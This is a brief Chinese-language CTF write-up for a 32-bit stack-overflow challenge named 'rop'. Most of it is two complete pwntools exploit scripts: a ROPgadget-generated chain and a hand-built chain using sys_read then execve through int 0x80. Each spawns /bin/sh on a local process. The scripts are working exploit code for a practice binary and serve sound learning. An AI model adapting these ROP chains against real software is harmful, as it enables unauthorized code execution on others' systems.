保护
ida
本地链接,栈溢出,没有system,考虑系统调用
ROPgadget发现可以控制所需的四个寄存器,但没有binsh
exp
法1,ropchain自动
from pwn import*
from struct import pack
i=process("/home/error/桌面/rop")
p = b'a'*(0xc+4)
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080b8016) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0805466b) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080de769) # pop ecx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x0806ecda) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080492d3) # xor eax, eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0807a66f) # inc eax ; ret
p += pack('<I', 0x0806c943) # int 0x80
i.sendline(p)
i.interactive()
法2,手动,调用sys_read,写入binsh
from pwn import*
i=process("/home/error/桌面/rop")
context.log_level="debug"
pop_eax=0x080b8016
pop_ebx=0x080481c9
pop_ecx=0x080de769
pop_edx=0x0806ecda
int80=0x0806f430#用radare2,ropgadget搜索不到int 0x80;ret
bss=0x080EB5BD
p1=cyclic(0xc+4)
p1+=flat([pop_eax,0x3,pop_ebx,0,pop_ecx,bss,pop_edx,0x10,int80])
p1+=flat([pop_eax,0xb,pop_ebx,bss,pop_ecx,0,pop_edx,0,int80])
i.sendline(p1)
i.sendline(b"/bin/sh\x00")
i.interactive()